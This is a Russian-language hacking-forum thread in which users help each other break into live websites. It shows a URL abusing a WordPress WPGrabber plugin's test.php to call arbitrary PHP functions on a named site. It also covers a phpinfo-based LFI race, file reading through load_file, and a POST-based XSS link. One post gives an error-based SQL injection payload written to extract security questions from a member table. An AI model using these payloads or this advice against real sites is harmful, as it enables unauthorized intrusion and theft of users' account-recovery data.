архив с темой тоже нельзя загрузить? какая версия wp? из этой темы все попробовали? https://rdot.org/forum/showthread.php?t=3
Code: kratko-news.com/wp-content/plugins/wpgrabber/test.php?ajax=1&task=phpinfo можно ли вывести что то кроме пхпинфо? вроде все перепробовал, нефига не хочет
Лезем на офф сайт - http://wpgrabber.ru/ , качаем плагин. Открывает test.php В самом начала видим: Code: if ($_GET['ajax']) { $task = $_GET['task']; //sleep(1); $result = $task(); exit(); В самом конце видим: Code: function __start() { $('#display').html(''); $('#sbmt').hide(); $('#loading').show(); __echo('1. Тестированиe внешних запросов из php-функции file_get_contents()...'); $.get('?ajax=1&task=testFileGetContents', function( data ) { __echo( data ); __echo('<br>2. Тестированиe работы библиотеки CURL...'); $.get('?ajax=1&task=testCurl', function( data ) { __echo( data ); __echo('<br>3. Тестированиe внешних запросов из php-функции copy()...'); $.get('?ajax=1&task=testCopy', function( data ) { __echo( data ); __echo('<br>4. Тестированиe сохранения файла из php-функции file_get_contents()...'); $.get('?ajax=1&task=testFileGetContentsSaveFile', function( data ) { __echo( data ); __echo('<br>5. Тестированиe сохранения файла с помощью библиотеки CURL...'); $.get('?ajax=1&task=testCurlSaveFile', function( data ) { __echo( data ); __echo('<br><br>Тестирование завершено!'); $('#sbmt').show(); $('#loading').hide(); То есть доступными функциями для тестирования будут те, которые описаны в скрипте + те, для вызоав которых не нужна передача аргументов. Потому что итоговая строка строится как $func= $_GET['task'].'()' Такие функции для php можешь посмотреть здесь -> http://php.net/manual/ru/ref.info.php
Ребята, пробую phpinfo LFI пробить. Во всех случаях временный файл удаляется раньше инклуда. Ни у кого нету 100% рабочего сплойта, который не удаляется? Отчего зависит время жизни tmp файла?
как узнал, что удаляется? уверен, что создается? пробовал эксплоит написать, чтобы не вручную это делать?
блин,вот всё из таблиц могу вывести,но вот нужную колонку никак не хочет выводить,мож я что не так делаю,запрос такой 'and(select 1 from(select count(*),concat((SELECT security_question FROM member WHERE member_id =1000),floor(rand(0)*2))x from information_schema.tables group by x)a)and' ???? может ещё есть какой вариант
ошибку не показывает,просто обновляется страница,хотя из member можно извлечь всё кроме security_question и security_answer,(самые нужные)))
Привет, кто знает, могу читать файлы через load_file, незнаю только как найти полный путь к корню сайта на сервере, может можно, как то через load_file ? сервер Apache 2.2.22
запрос передается через POST, а вы шлете через GET. чуете разницу? http://hackers2devnull.blogspot.ru/2013/07/exploiting-post-method-xss-silently.html
а вот это уже ваша задача, куда админ положил, там и будет. https://forum.antichat.ru/threads/324564/ какая ОС на сервере?
